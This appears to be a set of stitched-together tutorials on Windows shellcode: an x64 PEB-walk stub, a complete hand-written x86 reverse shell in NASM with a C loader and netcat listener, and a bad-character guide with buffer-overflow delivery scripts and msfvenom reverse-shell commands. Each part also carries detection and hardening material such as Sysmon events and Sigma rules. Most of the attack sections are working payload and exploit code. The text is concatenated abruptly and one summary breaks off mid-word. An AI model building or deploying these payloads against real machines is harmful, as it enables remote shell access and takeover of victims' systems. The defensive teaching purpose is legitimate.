The pieces combine into a recognisable x64 stub: align the stack, walk the PEB to find kernel32.dll, parse the EAT to resolve GetProcAddress and LoadLibraryA, and then call out through the standard ABI with proper shadow space.

[BITS 64]
_start:
    ; --- entry: defensively align stack ---
    and   rsp, 0xFFFFFFFFFFFFFFF0
    sub   rsp, 0x28                ; shadow space + alignment

    ; --- locate kernel32.dll via PEB ---
    mov   rbx, [gs:0x60]           ; TEB -> PEB
    mov   rbx, [rbx + 0x18]        ; PEB -> Ldr
    mov   rbx, [rbx + 0x20]        ; InMemoryOrderModuleList.Flink
    mov   rbx, [rbx]               ; -> ntdll entry
    mov   rbx, [rbx]               ; -> kernel32 entry
    mov   r15, [rbx + 0x30]        ; r15 = kernel32 base

    ; --- resolve GetProcAddress via ROR-13 hash (call into eat_lookup) ---
    mov   rcx, r15
    mov   edx, 0x7C0DFCAA          ; ROR-13("GetProcAddress")  (illustrative)
    call  eat_lookup               ; rax = &GetProcAddress
    mov   r14, rax

    ; --- call LoadLibraryA("user32.dll") via GetProcAddress ---
    mov   rcx, r15                 ; hModule = kernel32
    lea   rdx, [rel s_LoadLibraryA]
    call  r14                      ; rax = &LoadLibraryA
    lea   rcx, [rel s_user32]
    call  rax                      ; rax = HMODULE user32

    ; --- ... continue resolution and API calls ...

    add   rsp, 0x28
    ret

s_LoadLibraryA: db "LoadLibraryA", 0
s_user32:       db "user32.dll", 0

; eat_lookup: in rcx=module base, edx=ROR13 hash -> rax = export addr
eat_lookup:
    ; (see §7 for the inner loop)
    ret

Every block in the skeleton corresponds to one of the rules established above: sub rsp, 0x28 for shadow + alignment, gs:[0x60] for the PEB, [rbx + 0x30] for DllBase, lea + RIP-relative strings for PIC, and r14 / r15 carrying non-volatile state across calls without manual save/restore.

10. Common Attacker Techniques

Technique	Description
PEB-walk API resolution	Locate `kernel32.dll` via `gs:[0x60]` chain, parse exports by hash
ROR-13 export hashing	Avoid embedded API name strings; survive static signature scans
RIP-relative PIC	`lea reg, [rel label]` to address embedded data without fixups
Sub-register zero-extension	`mov eax, imm32` to write `RAX` with no null bytes
Shadow-space-aware call wrapping	`sub rsp, 0x28` around every Win32 call from an unknown caller
Direct Win32 → Native API substitution	Call `Nt*` syscalls to bypass usermode hooks (`T1106`)
Reflective loading of a PE in memory	Shellcode bootstraps a full PE image without touching disk (`T1620`)

11. Defensive Strategies & Detection

Shellcode is observable at multiple layers. The most reliable signals come from the behaviours the techniques above require, not from the byte patterns they happen to produce.

Sysmon events to enable and triage:

EventID 1 — Process Create. Unusual parent/child chains (browser, Office, mail client spawning cmd.exe / powershell.exe) are the cheapest, highest-yield signal.
EventID 8 — CreateRemoteThread. Cross-process thread creation into LSASS, browsers, or signed Windows binaries is high-fidelity.
EventID 10 — ProcessAccess. Watch GrantedAccess masks like 0x1FFFFF (full access) and 0x1010 (read + VM-write).
EventID 17 / 18 — Pipe creation/connection, frequently used by shellcode-launched implants for C2.

ETW providers worth subscribing to in EDR pipelines:

Microsoft-Windows-Kernel-Process — kernel-side process/thread/image events.
Microsoft-Windows-Threat-Intelligence (PPL-only) — NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx at the syscall layer, bypassed by no usermode hook.
Microsoft-Windows-Security-Auditing — handle and object access.

Audit policies: Audit Process Creation (Success) and Audit Kernel Object surface the same events to the classic Security log for SIEM ingestion.

Behavioural signals defenders should hunt on:

Threads with StartAddress in MEM_PRIVATE regions that are PAGE_EXECUTE_* and not backed by a file image.
CallTrace containing UNKNOWN frames — the calling instruction lives in unbacked memory.
gs:[0x60] opcode pattern (65 48 8B 04 25 60 00 00 00) inside executable regions of non-system modules.
ROR-13 hashing loops in memory scans.

Sigma sketch — suspicious cross-process access typical of shellcode injection:

title: Suspicious Cross-Process Access With VM-Write Rights
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1FFFFF'
      - '0x1410'
      - '0x1010'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\WmiPrvSE.exe'
  condition: selection and not filter_legit
level: high

Hardening to deploy on monitored endpoints:

Arbitrary Code Guard (ACG) — denies the PAGE_EXECUTE_* transition that turns a MEM_PRIVATE shellcode buffer into runnable code.
Control Flow Guard (CFG) — invalidates indirect calls into unregistered targets, which shellcode entry points always are.
Block Win32 API calls from Office macros / child processes — Attack Surface Reduction rule that severs the most common shellcode delivery vector.
PPL-protected EDR with kernel ETW Ti subscription — preserves syscall-layer telemetry even when userland hooks are patched out.

A useful EDR tripwire is to permute the head of InMemoryOrderModuleList with stub entries: shellcode that walks two Flinks blindly resolves the decoy module, fails to find expected exports, and crashes — producing a high-fidelity detection.

12. Tools for x64 Shellcode Analysis

Tool	Description	Link
NASM	Assembler for the snippets in this tutorial; emits raw binary for direct hex inspection	`nasm.us`
Keystone Engine	Programmatic assembler (Python bindings) for bad-character analysis labs	`keystone-engine.org`
x64dbg	User-mode debugger; trace shellcode through `gs:[0x60]` and EAT walks	`x64dbg.com`
WinDbg	Inspect `_TEB`, `_PEB`, `_PEB_LDR_DATA`, `_LDR_DATA_TABLE_ENTRY` on the target build	`learn.microsoft.com`
Ghidra / IDA	Static analysis of shellcode-bearing samples and reflective loader stubs	`ghidra-sre.org`
Volatility 3	Memory forensics: enumerate suspicious `MEM_PRIVATE` + `RX` regions, hunt unbacked threads	`volatilityfoundation.org`
Process Hacker	Live triage of thread start addresses and memory protections	`processhacker.sourceforge.io`
Godbolt Compiler Explorer	Inspect MSVC-emitted x64 prologues to confirm ABI assumptions	`godbolt.org`

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Process Injection (umbrella)	`T1055`	Sysmon `EventID 8` + `EventID 10` with VM-write `GrantedAccess`
DLL Injection	`T1055.001`	Image Load (`EventID 7`) from `MEM_PRIVATE`-allocated path
Portable Executable Injection	`T1055.002`	Volatility scans for PE headers in `MEM_PRIVATE` `RX` regions
APC Injection	`T1055.004`	ETW Ti `NtQueueApcThread` to remote thread; alerted thread-start addresses
Process Hollowing	`T1055.012`	`EventID 1` with suspended child, followed by `EventID 10` write + resume
Native API	`T1106`	ETW Ti syscall provider; direct `Nt*` calls outside `ntdll`
Obfuscated Files or Information	`T1027`	YARA on ROR-13 loops; entropy heuristics on dropped payloads
Reflective Code Loading	`T1620`	Unbacked `RX` memory with PE magic / no module image record

Summary

x64 Windows shellcode is governed by a strict ABI: argument registers RCX/RDX/R8/R9, return in RAX, a 32-byte shadow space, and 16-byte stack alignment at every call.
The TEB is reached via gs:[0x60] on x64; every PEB offset (+0x18, +0x20, +0x30) differs from the x86 layout and must be verified against the target build.
Position-independent API resolution combines a PEB walk to kernel32.dll with an EAT walk using ROR-13 name hashing to avoid embedded strings.
Null-byte avoidance leans on 32-bit sub-register writes that zero-extend, RIP-relative lea, and XOR-then-push idioms.
Detection is layered: Sysmon EventID 8/10 for injection chains, ETW Threat-Intelligence for syscall-level memory writes, behavioural hunts for unbacked RX regions, and ACG/CFG/ASR hardening to deny the primitives shellcode depends on.

References

Writing Your First Shellcode: x86 Reverse Shell from Scratch

Objective: Understand how a Windows x86 reverse shell payload is hand-built in NASM assembly — walking the PEB to locate kernel32.dll, parsing the PE export table to resolve GetProcAddress without imports, initialising Winsock, and spawning cmd.exe over a socket — and learn the telemetry each stage emits so you can detect and defend against it.

1. What Is Shellcode? Constraints and Goals

Shellcode is a self-contained blob of machine code that runs after a control-flow hijack (or injection) with no loader, no imports, and no fixed base address. It is the raw payload that tools like msfvenom emit; understanding it byte-by-byte is what lets a defender recognise it in memory.

A Windows x86 reverse shell differs from a Linux equivalent in one fundamental way: Linux exposes a stable syscall/int 0x80 interface, while Windows forces you to call documented Win32 APIs — and you cannot import them, because injected code has no import table. You must therefore find the APIs yourself at runtime.

Constraint	Description
Position independent	Runs at an unknown address; all references are stack-relative or computed
Null-free	`\x00` terminates strings in many injection vectors and truncates the payload
No imports	API addresses must be resolved from loaded modules at runtime
Bad-char aware	`\x00`, `\x0a`, `\x0d` and vector-specific bytes must be avoided by design

Lab setup: a Windows 10 x86 VM, NASM for assembly, WinDbg for stepping the PEB walk, a small C runner to execute the blob, and a Python scanner to audit bad characters. Build and test only in an isolated VM.

2. x86 Calling Conventions and Stack Mechanics

Win32 APIs use stdcall: arguments are pushed right-to-left, and the callee cleans the stack with ret N. This matters because after a successful API call you do not adjust esp yourself — the function already did. cdecl (caller cleans) appears only in CRT helpers you will not touch here.

Convention	Stack Cleanup	Argument Order	Used By
`stdcall`	Callee (`ret N`)	Right-to-left	Win32 APIs (`CreateProcessA`, `WSASocketA`)
`cdecl`	Caller	Right-to-left	CRT functions

eax, ecx, and edx are volatile (caller-saved); ebx, esi, edi, and ebp survive a call. Shellcode exploits this: stash the kernel32 base in ebx and a resolver pointer in ebp, and they persist across every API call. Strings and structures are constructed by pushing dwords onto the stack in reverse, then referencing them directly through esp.

3. The PEB Walk: Finding kernel32.dll Without Imports

Every thread can reach its Process Environment Block (PEB) through the TEB at FS:[0x30]. The PEB holds Ldr (a PEB_LDR_DATA) at +0x0C, whose InMemoryOrderModuleList at +0x14 is a doubly-linked list of loaded modules. On Windows 7–11 x86 the load order is fixed: [0] the executable → [1] ntdll.dll → [2] kernel32.dll. Two FLink dereferences land on kernel32‘s entry, and DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

bits 32
    xor    eax, eax
    mov    eax, [fs:0x30]      ; TEB->ProcessEnvironmentBlock (PEB)
    mov    eax, [eax+0x0c]     ; PEB->Ldr (PEB_LDR_DATA)
    mov    eax, [eax+0x14]     ; Ldr->InMemoryOrderModuleList (1st: executable)
    mov    eax, [eax]          ; FLink -> ntdll.dll entry
    mov    eax, [eax]          ; FLink -> kernel32.dll entry
    mov    ebx, [eax+0x10]     ; LDR entry->DllBase (kernel32 base) -> ebx

Verify the chain live in WinDbg before trusting any offset on your target build:

0:000> dt nt!_TEB @$teb ProcessEnvironmentBlock
0:000> dt nt!_PEB @$peb Ldr
0:000> dt nt!_PEB_LDR_DATA poi(@$peb+0xc) InMemoryOrderModuleList
0:000> dl poi(poi(@$peb+0xc)+0x14) 4

Flowchart showing the PEB walk chain from TEB at FS:[0x30] through PEB, PEB_LDR_DATA, and InMemoryOrderModuleList to reach kernel32.dll base address — Two FLink dereferences from the module list head land on kernel32.dll’s LDR entry; DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

4. Export Table Parsing: Resolving GetProcAddress

The bootstrap problem: shellcode cannot call GetProcAddress until it has found GetProcAddress. The fix is to parse the kernel32 PE export table manually. From the base, e_lfanew at +0x3C reaches the NT headers; the export-directory RVA lives at NT +0x78; the directory exposes three parallel arrays — AddressOfNames (+0x20), AddressOfNameOrdinals (+0x24), and AddressOfFunctions (+0x1C).

; ebx = kernel32 base
    mov    eax, [ebx+0x3c]     ; e_lfanew
    mov    eax, [ebx+eax+0x78] ; export table RVA
    lea    edi, [ebx+eax]      ; edi -> IMAGE_EXPORT_DIRECTORY
    mov    ecx, [edi+0x20]     ; AddressOfNames RVA
    lea    ecx, [ebx+ecx]      ; -> name-pointer array
    xor    edx, edx            ; name index = 0
.next:
    mov    esi, [ecx+edx*4]    ; RVA of candidate name
    lea    esi, [ebx+esi]      ; -> ASCII name string
    ; compare esi against "GetProcAddress" (string or 4-byte hash) ...
    inc    edx
    jmp    .next
.match:
    mov    eax, [edi+0x24]     ; AddressOfNameOrdinals RVA
    movzx  eax, word [ebx+eax+edx*2]   ; ordinal index for this name
    mov    ecx, [edi+0x1c]     ; AddressOfFunctions RVA
    mov    eax, [ebx+ecx+eax*4]; function RVA
    lea    eax, [ebx+eax]      ; eax = VA of GetProcAddress

Production shellcode usually replaces the literal strcmp with a rolling 4-byte hash of each export name — it is smaller and naturally null-free.

Diagram of PE export table structure showing how shellcode traverses from kernel32 base address through NT headers to the export directory and its three parallel arrays to resolve GetProcAddress — Shellcode walks three parallel export arrays — names, ordinals, and functions — to translate a name hash into the final virtual address of GetProcAddress.

5. Bootstrapping Further API Resolution

Once GetProcAddress is resolved, save it (e.g. in ebp) and use it to resolve everything else. The first follow-up is LoadLibraryA, which lets you bring in ws2_32.dll and resolve the Winsock functions the reverse shell needs.

; ebp = resolved GetProcAddress, ebx = kernel32 base
    push   0x41797261          ; "aryA"
    push   0x7262694c          ; "Libr"
    push   0x64616f4c          ; "Load"
    mov    esi, esp            ; esi -> "LoadLibraryA"
    push   esi
    push   ebx                 ; hModule = kernel32
    call   ebp                 ; GetProcAddress -> LoadLibraryA in eax
    ; eax now holds LoadLibraryA; call it on "ws2_32.dll", then resolve
    ; WSAStartup, WSASocketA, WSAConnect, CreateProcessA, ExitProcess.

Every API name is pushed as reversed dwords so it reads correctly in memory. Wrap the resolve-and-call logic in a small subroutine that takes a module base and a name pointer; the reverse shell calls it seven times.

6. Winsock Initialisation and Socket Creation

WSAStartup(0x0202, &wsaData) must run before any socket API. Reserve the 400-byte WSADATA on the stack and pass a pointer; the OS fills it. Then WSASocketA(2, 1, 6, NULL, 0, 0) creates a TCP socket (AF_INET, SOCK_STREAM, IPPROTO_TCP).

    sub    esp, 0x190          ; reserve WSADATA (400 bytes)
    push   esp                 ; lpWSAData
    push   0x0202              ; wVersionRequired = 2.2
    call   <WSAStartup>

    xor    eax, eax
    push   eax                 ; dwFlags
    push   eax                 ; g
    push   eax                 ; lpProtocolInfo = NULL
    push   6                   ; IPPROTO_TCP
    push   1                   ; SOCK_STREAM
    push   2                   ; AF_INET
    call   <WSASocketA>        ; eax = socket handle
    mov    edi, eax            ; save socket in edi

Build the 16-byte SOCKADDR_IN inline and connect. The IP and port are stored network byte order (big-endian); 127.0.0.1:4444 becomes 0x0100007f and the packed family/port dword 0x5c110002.

    xor    eax, eax
    push   eax                 ; sin_zero[4..8]
    push   eax                 ; sin_zero[0..4]
    push   0x0100007f          ; sin_addr  = 127.0.0.1
    push   0x5c110002          ; sin_port 4444 | sin_family AF_INET
    mov    esi, esp            ; esi -> SOCKADDR_IN

    push   eax                 ; lpCallee/QoS chain (NULLs)
    push   eax
    push   eax
    push   eax
    push   0x10                ; namelen
    push   esi                 ; name -> SOCKADDR_IN
    push   edi                 ; socket
    call   <WSAConnect>

7. Spawning cmd.exe Over the Socket

The final stage is the most error-prone: a fully populated 68-byte STARTUPINFOA with cb = 0x44, dwFlags = STARTF_USESTDHANDLES (0x100), and all three standard handles pointed at the connected socket. CreateProcessA(NULL, " cmd.exe", ...) then launches the shell with stdin/stdout/stderr riding the TCP stream.

    xor    eax, eax
    push   edi                 ; hStdError  = socket
    push   edi                 ; hStdOutput = socket
    push   edi                 ; hStdInput  = socket
    times 9 push eax           ; zero lpReserved2..dwY (9 dwords)
    push   0x00000100          ; dwFlags = STARTF_USESTDHANDLES
    times 4 push eax           ; lpTitle, lpDesktop, lpReserved, wShowWindow pad
    push   0x44                ; cb = sizeof(STARTUPINFOA)
    mov    ebx, esp            ; ebx -> STARTUPINFOA

    sub    esp, 0x10
    mov    esi, esp            ; esi -> PROCESS_INFORMATION

    push   eax                 ; "....\0" terminator (runtime-supplied null)
    push   0x6578652e          ; ".exe"
    push   0x646d6320          ; " cmd"  (0x20 = space, null-free)
    mov    edx, esp            ; edx -> " cmd.exe"

    push   esi                 ; lpProcessInformation
    push   ebx                 ; lpStartupInfo
    push   eax                 ; lpCurrentDirectory
    push   eax                 ; lpEnvironment
    push   eax                 ; dwCreationFlags
    inc    eax
    push   eax                 ; bInheritHandles = TRUE
    dec    eax
    push   eax                 ; lpThreadAttributes
    push   eax                 ; lpProcessAttributes
    push   edx                 ; lpCommandLine = " cmd.exe"
    push   eax                 ; lpApplicationName = NULL
    call   <CreateProcessA>

    push   eax                 ; uExitCode
    call   <ExitProcess>

Sequential flowchart of the full reverse shell execution chain from PEB walk through export parsing, Winsock initialisation, TCP connect, STARTUPINFOA setup, and final CreateProcessA call spawning cmd.exe — Every stage builds on the last: the PEB walk feeds export parsing, which unlocks Winsock, which provides the socket handle wired into cmd.exe’s standard I/O.

8. Null-Byte Elimination and Bad-Character Audit

A single \x00 mid-payload can truncate your shellcode. Design it out from the start.

Bad Byte	Naive Source	Null-Free Replacement
`\x00`	`mov ecx, 0`	`xor ecx, ecx`
`\x00` in string	`push 0x00657865` (“exe\0”)	terminator from `push eax` after `xor eax,eax`
`\x00` in `mov al,0`	`mov al, 0`	`xor eax, eax` then use `al`
`\x0a` / `\x0d`	constant containing CR/LF	re-encode IP/port or split the immediate

The runtime-supplied terminator trick (xor eax, eax → push eax) keeps the " cmd.exe" string null-free, and the leading space the space-padded " cmd" introduces is tolerated by CreateProcessA‘s command-line parser. Audit the assembled binary with a scanner:

import sys
BAD = {0x00, 0x0a, 0x0d}                # extend per injection vector

with open(sys.argv[1], "rb") as f:
    sc = f.read()
for i, b in enumerate(sc):
    if b in BAD:
        print(f"[!] bad char 0x{b:02x} at offset {i}")
print(f"[*] {len(sc)} bytes scanned")

9. Testing and Verification

Assemble to a flat binary, then execute it in a controlled runner that mirrors how an exploit lands code in memory — VirtualAlloc with PAGE_EXECUTE_READWRITE, copy, and call through a function pointer.

nasm -f bin reverse.asm -o reverse.bin
python3 badchars.py reverse.bin

#include <windows.h>
#include <string.h>
unsigned char sc[] = { /* contents of reverse.bin */ };

int main(void) {
    void *mem = VirtualAlloc(NULL, sizeof(sc),
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);   // RWX: loud, lab-only
    memcpy(mem, sc, sizeof(sc));
    ((void(*)())mem)();
    return 0;
}

Catch the callback with nc -lvnp 4444. Note the RWX allocation — real-world loaders allocate RW, copy, then flip to RX with VirtualProtect precisely because PAGE_EXECUTE_READWRITE is a classic detection signal.

10. Common Attacker Techniques

Technique	Description
PEB walk	Locate `kernel32.dll` base with no imports via `FS:[0x30]`
Export hashing	Resolve APIs by name hash to stay small and null-free
Stack string building	Push reversed dwords to stage `" cmd.exe"`, `ws2_32.dll`, API names
STDIO redirection	Point `hStdInput/Output/Error` at the socket for an interactive shell
Process injection	Deliver the blob via `VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread`
RWX → RX staging	Allocate `RW`, copy, `VirtualProtect` to `RX` to evade RWX heuristics

11. Defensive Strategies and Detection

Each shellcode stage emits telemetry. Map detections to the chain, not to a single indicator.

Sysmon Event ID	Name	What It Catches
`1`	Process Create	`cmd.exe` with an unexpected `ParentImage` / `ParentCommandLine`
`3`	Network Connection	Outbound TCP from `cmd.exe` or a non-browser binary (C2 connect-back)
`8`	CreateRemoteThread	Cross-process thread where `SourceImage` ≠ `TargetImage`
`10`	ProcessAccess	`GrantedAccess` to injected memory; `CallTrace` containing `UNKNOWN`
`11`	FileCreate	Shellcode or loader dropped to disk

Windows Security auditing adds Event 4688 (process creation with command line, when ProcessCreationIncludeCmdLine_Enabled = 1), 5156 (WFP outbound TCP allowed — the reverse connect at the network layer), and 4689 (process exit, for shell-lifetime correlation). The kernel Microsoft-Windows-Threat-Intelligence ETW provider emits KERNEL_THREATINT_TASK_ALLOCVM/PROTECTVM on RWX activity but requires a signed ELAM/PPL consumer.

The canonical community Sigma rule for shellcode injection keys on ProcessAccess:

title: Shellcode Process Injection via Suspicious ProcessAccess
logsource:
  category: process_access
  product: windows
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
tags:
  - attack.defense_evasion
  - attack.privilege_escalation
  - attack.t1055
level: high

Hardening: enable command-line auditing, deploy a tuned Sysmon baseline (SwiftOnSecurity / Olaf Hartong) for EIDs 1/3/8/10, enforce default-deny egress on workstations (reverse shells need outbound TCP), apply ASR rules such as D4F940AB-401B-4EFC-AADC-AD5F3C50688A (block Office child processes) and d3e037e1-3eb8-44c8-a917-57927947596d (block untrusted processes from removable media), and alert on VirtualAlloc(RWX). AMSI does not see raw shellcode but catches PowerShell/VBScript loaders.

Hierarchy diagram mapping each shellcode execution stage to its corresponding detection telemetry source including Windows Event IDs, Sysmon event IDs, ETW providers, ASR rules, and egress firewall controls — Effective defence maps detections to each stage of the kill chain rather than relying on a single indicator — RWX allocation, outbound TCP, and process creation each emit distinct, correlatable telemetry.

12. Tools for Shellcode Analysis

Tool	Description	Link
NASM	Assemble x86 to flat binary	`nasm.us`
WinDbg	Step the PEB walk and export parse live	`microsoft.com`
x64dbg	Dynamic analysis of the loader and payload	`x64dbg.com`
Ghidra	Static disassembly of extracted shellcode	`ghidra-sre.org`
Radare2	Lightweight disassembly and patching	`radare.org`
Sysmon	Generate EID 1/3/8/10 detection telemetry	`microsoft.com`
Volatility	Memory forensics — recover RWX regions and injected code	`volatilityfoundation.org`

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Command and Scripting Interpreter: Windows Command Shell	`T1059.003`	Sysmon EID 1 / 4688 `cmd.exe` spawn chain
Process Injection	`T1055`	Sysmon EID 10 `GrantedAccess` + `CallTrace UNKNOWN`
Process Injection: DLL Injection	`T1055.001`	Sysmon EID 7/8 on reflective-DLL delivery
Obfuscated Files or Information	`T1027`	Null-free/encoded IP/port constants in the blob
Non-Application Layer Protocol	`T1095`	Sysmon EID 3 / 5156 raw TCP from non-browser process
Application Layer Protocol: Web Protocols	`T1071.001`	Proxy/TLS inspection (contrast C2 transport)
System Information Discovery	`T1082`	PEB walk as in-memory module discovery
Native API	`T1106`	Direct `WSASocketA` / `CreateProcessA` calls without framework APIs

Summary

A Windows x86 reverse shell is just position-independent code that resolves its own APIs, opens a TCP socket, and redirects cmd.exe over it.
The PEB walk (FS:[0x30] → Ldr → InMemoryOrderModuleList, third entry) locates kernel32.dll with no imports.
Parsing the PE export table resolves GetProcAddress, which bootstraps LoadLibraryA and every Winsock function.
Null-byte and bad-character avoidance is a design constraint, not a post-step — xor for zero, reversed stack strings, runtime-supplied terminators.
Det

References

Bad Characters, Null Bytes, and Restricted Character Sets

Objective: Understand why certain bytes corrupt, truncate, or transform shellcode in stack-based buffer overflows, how to systematically enumerate a target’s restricted character set, and how to adapt encoding or instruction substitution to survive those constraints — alongside how defenders detect the resulting exploitation patterns.

1. What Are Bad Characters? The Concept Explained

A bad character is any byte that causes the vulnerable application’s input-handling routine to misbehave: corrupt, truncate, or transform the payload before it reaches EIP. There is no universal set. The exact bad characters depend on the application’s parsing logic and the protocol in use.

Shellcode cannot contain bytes that the target interprets incorrectly — a newline, a delimiter, or a string terminator. The root cause is usually a string-handling function. C runtime (CRT) routines like strcpy, strncpy, strcat, sprintf, and the deprecated gets operate on null-terminated buffers and stop on specific sentinel bytes.

When you inspect memory after a crash, you are hunting for three distinct failure modes:

Missing bytes — characters stripped entirely by a sanitiser.
Altered bytes — characters transformed (e.g., \x80 appearing as \x01).
Premature termination — a byte that halts the copy, so nothing after it is written.

Identifying which bytes trigger these behaviors is a mandatory phase before any reliable shellcode can be placed.

Flow diagram showing how a raw payload passes through a string API and produces three failure modes: missing bytes, altered bytes, and premature truncation before reaching the destination buffer — Three distinct ways a bad character corrupts a payload before it ever reaches the destination memory region.

2. Why `\x00` Is Always the First Enemy

The null byte (\x00) is always a bad character in string-based overflows. C-style string functions treat \x00 as the terminator, so any shellcode byte following a null is silently discarded.

Function	Behavior on `\x00`
`strcpy`	Stops copying at the first null
`strncpy`	Stops at null or `n` bytes
`strlen`	Returns length up to first null
`sprintf`	Terminates the formatted string
`gets`	Legacy, present in old targets

At the assembly level, strlen walks the buffer comparing each byte to zero and breaks on a match — that loop defines the truncation boundary. This is not a convention; it is a property of how the Windows CRT and Win32 LPSTR / LPWSTR parameters handle null-terminated strings.

Network contexts differ. A socket recv call reads a fixed byte count and will pass null bytes through the wire into the buffer. So \x00 may survive transport but still die the moment the data hits a strcpy. Treat the string API and the socket as separate constraint layers.

3. Common Bad Characters by Protocol and Context

Restrictions come from three sources: protocol-specific rules (HTTP terminating on \x0D\x0A), application sanitisation (stripping nulls or high bytes), and encoding layers (Base64 or Unicode transformations).

Byte	Hex	Reason
Null	`\x00`	String terminator — always bad in string overflows
Line Feed	`\x0A`	Newline — terminates input in many protocol parsers
Carriage Return	`\x0D`	CR — terminates input lines (HTTP, SMTP, POP3)
Space	`\x20`	Whitespace delimiter — terminates tokens in some parsers
Form Feed	`\xFF`	Causes issues in some parsing contexts

A web server vulnerable in its URI handler is the canonical restricted-set case: the legal URI character set is small, and non-printable or extended characters are rejected outright, narrowing or preventing exploitation. SMTP, POP3, and FTP argument parsers each impose their own delimiters.

4. Building and Sending the Test Byte Array

The standard methodology: generate every non-null byte (\x01–\xFF), place it after the EIP-overwrite offset, crash the target, and compare sent versus received in memory. Python builds the array cleanly:

# Generate \x01 through \xFF (255 bytes, null excluded)
badchar_test = bytearray(range(1, 256))

offset   = 2003                     # VulnServer TRUN EIP offset (illustrative)
buf      = b"A" * offset
buf     += b"B" * 4                 # EIP overwrite marker
buf     += bytes(badchar_test)      # byte array lands at ESP
buf     += b"C" * (3000 - len(buf)) # padding

You then deliver that buffer to the vulnerable service running under a debugger:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.10", 9999))
s.recv(1024)
s.send(b"TRUN /.:/" + buf)          # VulnServer TRUN command
s.close()

After the crash, the \x01–\xFF block should appear contiguously in memory, typically at or near ESP.

5. Inspecting Memory: Immunity Debugger and mona.py

In Immunity Debugger, follow ESP in the hex dump and use the mona plugin to diff what you sent against what landed.

!mona config -set workingfolder c:\mona\%p
!mona bytearray -cpb "\x00"
!mona compare -f c:\mona\bytearray.bin -a <ESP_address>

!mona config sets the output directory.
!mona bytearray -cpb "\x00" writes a reference bytearray.bin (all \x01–\xFF) excluding the specified bad chars.
!mona compare diffs the reference file against the live memory at the supplied ESP address and prints a per-byte verdict.

Annotated mona output looks like:

[+] Comparing with memory at address 0x00ab1a30
    Only the first 18 bytes were identical
    Possibly bad chars: 0a 0d
[+] Bytes omitted from input: ...

6. Iterative Elimination: Narrowing the Bad List

Mona flags where the sequence diverges. The critical nuance: only the first byte of a corrupted run is necessarily bad. Subsequent corruption is often a knock-on effect of that first offender shifting alignment.

If memory shows 11 12 13 15 with 14 missing, then \x14 is the only confirmed bad character at that step — not \x15 or anything after it. Add \x14 to your exclusion list, regenerate, and re-run:

BADCHARS = b"\x00\x0a\x0d"          # grows one confirmed byte per pass

full = bytearray(range(1, 256))
test = bytes(b for b in full if b not in BADCHARS)

# rebuild buffer with `test`, resend, re-inspect under the debugger

Repeat the send → inspect → eliminate cycle until the entire \x01–\xFF block (minus the confirmed bad bytes) appears intact at ESP. Mirror the same exclusion list in !mona bytearray -cpb "..." so the reference file matches.

Cyclic flow diagram of the iterative bad-character elimination process: generate byte array, send, crash and inspect, diff with mona, confirm bad byte, add to exclusion list, and repeat until the array is intact — Only the first byte of a corrupted run is confirmed bad — iterate the send-diff-eliminate loop until the full array survives intact in memory.

7. Encoding Shellcode with msfvenom

Once the bad-char set is known, generate shellcode that avoids it. msfvenom‘s -b flag specifies the forbidden bytes; it then picks an encoder — x86/shikata_ga_nai by default — to re-encode around them.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20' -e x86/shikata_ga_nai -f python

x86/shikata_ga_nai (ranked excellent) is a polymorphic XOR additive-feedback encoder. It reorders instructions and dynamically selects registers, producing different output each run and frustrating signature-based detection.

Size overhead is real. Encoding inflates the payload — a 71-byte stub can grow to 98 bytes after one shikata_ga_nai pass. Account for buffer space accordingly.

Failure case: when the bad-char list is too restrictive, shikata_ga_nai may abort with "A valid opcode permutation could not be found". Fall back to an alternative encoder:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20\xff' -e x86/call4_dword_xor -f python

x86/call4_dword_xor and x86/countdown use different decoder stubs that may satisfy tighter constraints.

Hierarchy diagram showing how a known bad-character set feeds into msfvenom which selects between shikata_ga_nai as default, call4_dword_xor as fallback, and alpha_mixed for printable-only constraints, all producing encoded shellcode — msfvenom encoder selection is driven by the bad-char list — escalate through fallback encoders when the default cannot find a valid opcode permutation.

8. Alphanumeric and Printable-Only Constraints

When so many bytes are forbidden that standard encoders fail, switch to printable-ASCII-only output. x86/alpha_mixed (msfvenom) and the standalone Alpha2 tool emit shellcode confined to the \x21–\x7E printable range — ideal when the target only passes printable URI characters.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -e x86/alpha_mixed BufferRegister=ESP -f python

The BufferRegister option tells the decoder which register points to the payload, removing the self-locating GetPC stub. The trade-off is size — an alphanumeric payload can balloon to 710 bytes or more. When the available buffer cannot hold an inflated payload, stage a small egghunter to search memory for a larger second-stage payload placed elsewhere.

9. Instruction Substitution: Jumping Without Bad Opcodes

Sometimes the bad character lives in your jump opcode, not your shellcode body. The short JMP maps to \xEB, and \xEB is frequently bad in HTTP and other network-protocol targets — so the instruction cannot be used as-is.

Instruction	Opcode bytes	Notes
`JMP SHORT +6`	`\xEB \x06`	`\xEB` often restricted
`JE / JNE` pair	`\x74 .. \x75 ..`	Two complementary branches always taken together
Near `JMP`	`\xE9 .. .. .. ..`	Alternative when `\xEB` is bad

A bad-char-safe substitution uses a conditional pair that, regardless of the zero flag, always transfers control:

    ; JMP SHORT replacement using complementary conditionals
    je  short target     ; 74 xx  -> jump if ZF=1
    jne short target     ; 75 xx  -> jump if ZF=0
    ; one branch is always taken; no \xEB byte present
target:
    ; decoder / shellcode continues here

In SEH overwrites, the 4-byte nSEH field typically holds a JMP SHORT to the handler stub — its opcode bytes must also dodge the bad-char set. Use mona or WinDbg to locate suitable jump equivalents and clean POP POP RET gadgets.

10. Unicode / Wide-Character Transformations

